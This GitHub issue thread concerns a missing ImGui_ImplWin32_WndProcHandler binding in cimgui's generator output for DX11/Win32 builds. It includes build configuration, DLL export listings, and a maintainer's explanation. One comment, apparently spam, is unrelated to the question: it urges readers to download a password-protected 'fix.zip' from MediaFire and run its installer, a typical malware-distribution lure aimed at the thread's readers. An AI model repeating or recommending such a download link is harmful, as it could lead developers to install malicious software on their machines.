### ISSUE TITLE
Missing ImGui_ImplWin32_WndProcHandler when generating DX11/Win32

### ISSUE THREAD

**Issue by fkelava** [cimgui/cimgui#276]
Hi,

I am attempting to compile ``cimgui`` with DX11 and Win32 backends, the latest commit, for x86. Based on this I'm building a custom version of ImGui.NET. This is successful, except ``ImGui_ImplWin32_WndProcHandler`` is missing from all generator output despite being compiled into the ``cimgui.dll``, so the C# binding does not show it.

Basically:
- In ``generator/generator.bat``, ``./generator.lua cl "internal noimstrv" dx11 win32 %*``
- ``CMakeLists.txt`` amended as such:
```
#general settings
file(GLOB IMGUI_SOURCES
    cimgui.cpp
    imgui/imgui.cpp
    imgui/imgui_draw.cpp
    imgui/imgui_demo.cpp
    imgui/imgui_widgets.cpp
    imgui/backends/imgui_impl_win32.cpp
    imgui/backends/imgui_impl_dx11.cpp
    ${TABLES_SOURCE}
)
```
- Use MSVC to compile
- ``dumpbin.exe /EXPORTS cimgui.dll`` gives all of the expected functions as exports:
```
        438  1B5 00002C16 ImGui_ImplDX11_CreateDeviceObjects = @ILT+7185(_ImGui_ImplDX11_CreateDeviceObjects)
        439  1B6 0000110E ImGui_ImplDX11_Init = @ILT+265(_ImGui_ImplDX11_Init)
        440  1B7 00005097 ImGui_ImplDX11_InvalidateDeviceObjects = @ILT+16530(_ImGui_ImplDX11_InvalidateDeviceObjects)
        441  1B8 00003F9E ImGui_ImplDX11_NewFrame = @ILT+12185(_ImGui_ImplDX11_NewFrame)
        442  1B9 000037A6 ImGui_ImplDX11_RenderDrawData = @ILT+10145(_ImGui_ImplDX11_RenderDrawData)
        443  1BA 00002C2F ImGui_ImplDX11_Shutdown = @ILT+7210(_ImGui_ImplDX11_Shutdown)
        444  1BB 00004697 ImGui_ImplWin32_EnableAlphaCompositing = @ILT+13970(_ImGui_ImplWin32_EnableAlphaCompositing)
        445  1BC 00005A4C ImGui_ImplWin32_EnableDpiAwareness = @ILT+19015(_ImGui_ImplWin32_EnableDpiAwareness)
        446  1BD 00002F09 ImGui_ImplWin32_GetDpiScaleForHwnd = @ILT+7940(_ImGui_ImplWin32_GetDpiScaleForHwnd)
        447  1BE 00005BA0 ImGui_ImplWin32_GetDpiScaleForMonitor = @ILT+19355(_ImGui_ImplWin32_GetDpiScaleForMonitor)
        448  1BF 0000549D ImGui_ImplWin32_Init = @ILT+17560(_ImGui_ImplWin32_Init)
        449  1C0 00002F2C ImGui_ImplWin32_InitForOpenGL = @ILT+7975(_ImGui_ImplWin32_InitForOpenGL)
        450  1C1 0000236F ImGui_ImplWin32_NewFrame = @ILT+4970(_ImGui_ImplWin32_NewFrame)
        451  1C2 00001D52 ImGui_ImplWin32_Shutdown = @ILT+3405(_ImGui_ImplWin32_Shutdown)
        452  1C3 00005128 ImGui_ImplWin32_WndProcHandler = @ILT+16675(_ImGui_ImplWin32_WndProcHandler)
```
Attached is the generated [impl_definitions.json](https://github.com/user-attachments/files/16770991/impl_definitions.json).

Am I missing something obvious or misunderstanding how to accomplish this?

**Comment by fkelava** [comment]
Just for clarification, the function also does not appear in ``cimgui_impl.h`` generated through these steps.

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sonoro1234** [comment]
It is a Dear imgui decision:
https://github.com/ocornut/imgui/blob/139e99ca37a3e127c87690202faec005cd892d36/backends/imgui_impl_win32.h#L35
and
https://github.com/ocornut/imgui/blob/139e99ca37a3e127c87690202faec005cd892d36/examples/example_win32_directx11/main.cpp#L272

**Comment by fkelava** [comment]
I see. Well, as long as it is compiled and exposed with ``extern "C"`` linkage- which it is- I can live with this.

For now my workaround is to P/Invoke it directly from C#. If I ever decide to properly solve it I'll post my solution here.

Thanks for the assistance.
